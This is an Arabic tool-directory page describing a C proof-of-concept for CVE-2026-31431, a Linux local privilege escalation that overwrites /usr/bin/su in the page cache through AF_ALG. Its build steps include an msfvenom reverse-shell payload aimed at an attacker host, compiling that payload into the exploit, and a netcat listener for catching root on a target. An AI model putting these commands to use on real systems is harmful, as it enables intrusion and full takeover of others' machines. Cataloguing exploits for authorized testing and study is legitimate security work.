Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-31431 — C PoC لـ CVE-2026-31431، ثغرة رفع صلاحيات محلية (LPE) في لينكس غير مميزة تستغل تلف ذاكرة التخزين المؤقت للصفحات في AF_ALG لاستبدال /usr/bin/su والحصول على صلاحيات الجذر. | Kitploit
أدوات/GitHubGitHub/mcub3/cve-2026-31431
تصعيد الامتيازاتأطر الاستغلالتحليل الثغرات الأمنيةالاستغلالتطوير الحمولاتاستغلال الملفات الثنائية
GitHubmcub3/cve-2026-31431

CVE-2026-31431

C PoC لـ CVE-2026-31431، ثغرة رفع صلاحيات محلية (LPE) في لينكس غير مميزة تستغل تلف ذاكرة التخزين المؤقت للصفحات في AF_ALG لاستبدال /usr/bin/su والحصول على صلاحيات الجذر.

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-31431 (Copy Fail) — C PoC

ثغرة رفع صلاحيات محلية (LPE) بسيطة بدون صلاحيات عبر كتابة 4 بايتات مُتحكَّم بها في ذاكرة التخزين المؤقت للصفحات (page cache) لأي ملف قابل للقراءة عبر خطأ منطقي في AF_ALG (النواة 4.14 ← أوائل 2026).

أفسد /usr/bin/su في الذاكرة، ثم شغّله ← ستحصل على صلاحيات root.

Exploit screenshot

البناء والتشغيل

root@kitploit:~
# 1. توليد حمولة ELF (مثال لصدفة عكسية)
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> PrependSetuid=true \
    PrependSetgid=true -f elf -a x86 --platform linux -o payload_x86

# 2. الترجمة (ثابتة، مجرّدة، الحمولة مضمّنة عبر .incbin)
gcc -m32 -static -Wl,--strip-all -DPAYLOAD_FILE=payload_x86 -o copy_fail_x86 copy_fail.c

# 3. شغّل المستمع أولاً (nc -lvp <LPORT>)، ثم شغّل الاستغلال على الجهاز الهدف
./copy_fail_x86

التفاصيل الأساسية

• CVE: CVE-2026-31431 • CVSS: 7.8 • الإصلاح: commit a664bf3d603d

• يعمل على جميع توزيعات لينكس تقريباً 2017–2026 (بما في ذلك الحاويات).

• التقنية: يفتح /usr/bin/su بـ O_RDONLY، ويستغل فك التشفير الموضعي (in-place decryption) في AEAD لدمج حمولة مُصمَّمة مباشرة في ذاكرة التخزين المؤقت للصفحات، متجاوزاً VFS.

• الإفصاح الأصلي وPoC بلغة بايثون بحجم 732 بايت ← https://copy.fail

الترخيص

MIT – انظر LICENSE. لأغراض تعليمية / اختبارات مُصرَّح بها فقط. الاستخدام على مسؤوليتك الخاصة.

تنزيل الأداة